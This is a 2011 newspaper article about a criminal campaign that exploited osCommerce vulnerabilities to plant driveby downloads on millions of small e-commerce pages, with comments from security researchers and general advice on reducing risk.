Driveby downloads lurking on 8 million ecommerce web pages

August 12th, 2011

By Byron Acohido, USA TODAY, 12 August2011, P1B

Some 8 million web pages, published mostly by smaller merchants and professional firms, have been hijacked this summer and set up to usurp control of the PCs of unsuspecting site visitors.

That’s the latest development in a new style of hacking sweeping across the Web, according to research by website security firm Armorize.

“The misuse of numerous small sites is making the Internet a much more dangerous place,” says Alena Varkockova, lab analyst at antivirus firm Avast. “Even the unimportant sites can do big harm when misused.”

A single criminal gang using computer servers located in the Ukraine is responsible for the latest twist in converting legit web sites into delivery mechanisms for “driveby downloads,” according to Wayne Huang, chief technical officer at Armorize.

In a driveby download, malicious software gets inserted into the web browser of any unsuspecting Internet user — just by navigating to a hacked web page.

Mass distribution of these silent landmines began to accelerate a few years ago,  as criminal hackers began to leverage a technique called SQL injection, as the optimum way to take control of web pages.

SQL attacks take aim at the database layer of websites and traditionally require time and skill to carry out. A SQL hack involves querying the databases underlying a web page — until the database hiccups and accepts an injection of malicious code. Prior to early 2008, SQL injection hacks were done manually, one targeted website at a time.

At some point in the spring of 2008, a bright hacker came up with a way to use botnets to systematically probe the Internet for webpages whose databases could be easily injected with a small bit of malicious code.

SQL injection attacks instantly spiked — and the era of automated mass SQL injections began.

New injection technique

Fast forward to the summer of 2011. In June, Armorize co-founder and CTO Wayne Huang, discovered a cyber gang “Google dorking” — using advanced Google search queries to find vulnerable webpages, specifically those published by smaller e-commerce sites.  By July 4, this group had corrupted, by Huang’s conservative count, at least 30,000 web pages.

Then on 10 July 2011, a researcher, codenamed “Angel Injections,” posted information on new way to inject malicious code into websites using osCommerce, a free customer interaction tool used by smaller merchants and professional services firms. The advisory also included information on how to do a Google dork specifically crafted to find vulnerable osCommerce webpages.

By July 23rd, the original gang of hackers — the ones who had used Google dorks and mass SQL injection techniques to corrupt 30,000 web pages –  adopted the new research and massively scaled up their attack, finding and infecting, at peak,  8.3 million web pages over the next few days.

This pattern of grey hat researchers pushing out new vulnerability and exploit research, which is subsequently taken advantage of by criminals, goes back to Code Red, MS Blaster and a long line of infamous worms and viruses. Since 2005, the gap between fresh vulnerability and exploit information getting posted and live attacks spreading across the Web has gone from months, to weeks, to days to near real time.

In this case, the bad guys took free research, skipped the proof of concept phase, and moved directly to  introducing a  completely new, and stunningly effective,  injection technique, says Huang.

Huang

“This was not mass SQL injection. This injection was based on known vulnerabilities of osCommerce,” says Huang. “Mass SQL injection tries to bruteforce an injection and so the success rate is very low. This attack is based on known osCommerce vulnerabilities, the newest one disclosed on July 10th, so it is very accurate.

“These known vulnerabilities  are not SQL injection vulnerabilities,” continues Huang. “But rather authentication bypass and arbitrary file upload vulnerabilities. They have nothing to do with SQL injections what so ever.”

At the recent Black Hat conference in Las Vegas, security researchers marveled at the gang’s inventiveness.

To find smaller e-commerce sites equipped to handle customer transactions, the attackers deployed a network of compromised PCs, called a botnet, to run automated search queries through Google and Bing. To avoid detection, the botnet used a low-and-slow pattern, giving the attackers “a pretty accurate idea” of vulnerable targets, says Noa Bar Yosef, security strategist at security firm Imperva.

Slicing up the Web

Grossman

Cybercriminals have begun to use search engines to “slice up the Web in bite-sized chunks to find what they’re looking for, in this case sites using osCommerce,” says Jeremiah Grossman, chief technical officer of web site security firm WhiteHat Security.

Next the gang inserted a mechanism that redirects the PCs of all site visitors to make a connection with a different server acting a distribution hub for a portfolio of malicious software. One such program, for instance, determines which web browser the visitor is using, then installs a customized program to usurp control of the specific browser.

“We currently intercept on average around 1,000 of this particular attack a day,” says Yuval Ben-Itzhak, chief technical officer of antivirus firm AVG.

With control of the visitor’s browser, the attacker can easily install malicious software that silently harvests all account logons, identity data and payment card data. The infected PC is usually also slotted into a botnet; the bad guys then use it on an ongoing basis to spread spam, carrying out hacktivists attacks and do other criminal activities.

On Wednesday, 10 August 2011,  Avast intercepted a driveby download, linked to the osCommerce hackers, lurking on the web site of the Super Glue Corporation. Avast alerted the company.

On Thursday, 11 August 2011,  the number of infected osCommerce web pages spiked to nearly 8 million after fluctuating between 8.3 million and 6 million late last week and earlier this week. Some web sites have been cleaned up, some re-infected and others freshly infected, says Huang.

Google and Microsoft say they continually scan for web pages conducting suspicious activities and issue warning pages in search results and via Google’s Chrome and Microsoft’s Internet Explorer browsers. They also provide free guidance and tools for web site owners to diagnose and clean up problems.

But many of the infected web pages won’t get cleaned up anytime soon, as the bad guys use “myriad techniques to ensure their malicious software goes undetected,” says Jon Clay, product manager at antivirus firm Trend Micro. Use of polymorphic infections that constantly change has become commonplace, says Clay.

So too have mechanisms that swiftly re-infect cleaned-up websites; the gang responsible for the osCommerce hacks are using a particularly effective re-infection technique, says Huang.

Reducing your risk

Website owners who don’t clean up thoroughly face a double whammy, exposing their customers to infections while risking getting their websites blocked or flagged as dangerous.

Internet users can reduce their risk by keeping web browser and antivirus updates current and avoiding use of Internet Explorer, since Microsoft’s dominant browser is also the most intensively probed for security holes, says Adam Wosotowsky, senior analyst at antivirus firm McAfee. “I suggest using Firefox or Chrome,” he says.

Consumers can also use browser plug-ins, such as noscript for Firefox, that disable programs from executing in the browser without explicit permission granted by the user. But that will make it inconvenient to use legit browser-activated programs. “Most people would be extremely surprised at the amount of active legitimate content that they are executing just to serve advertising and allow advertisers to track their habits,” says Wosotowsky.

Antivirus companies are also vigorously defending against driveby downloads. AVG and Trend Micro provide website scanning tools that watch for and block malicious programs from executing within browsers. Symantec, McAfee, Kaspersky and others assess the behavior and reputation of suspect websites, and block ones known to be booby trapped with driveby downloads.

Schouwenberg

“While there’s a high chance of running into a compromised web site, the chances of actually getting infected — while running security software — is extremely low,” says Roel Schouwenberg, senior researcher at Kaspersky Lab.

Trend Micro’s Clay won’t go that far. “Anti-virus is a baseline technology,” says Clay. “Additional protection is needed to combat today’s threats.”

WhiteHat’s Grossman cautions further that the osCommerce hack could be a harbinger of the cyberunderground getting positioned to capitalize on the push to enable more commerce and social activities in the Internet cloud. So far the osCommerce hackers have restrained themselvs to only implanting driveby downloads. But there is little stopping them from also cracking into the customer data bases of the hacked merchants’ sites.

“We’re being compelled to put all of our most intimate and sensitive data into the cloud where it becomes equidistant to all of the bad guys, where ever they happen to be,” says Grossman. “As we pursue these cloud features for convenience, we’re also making our data a convenient target for the bad guys.”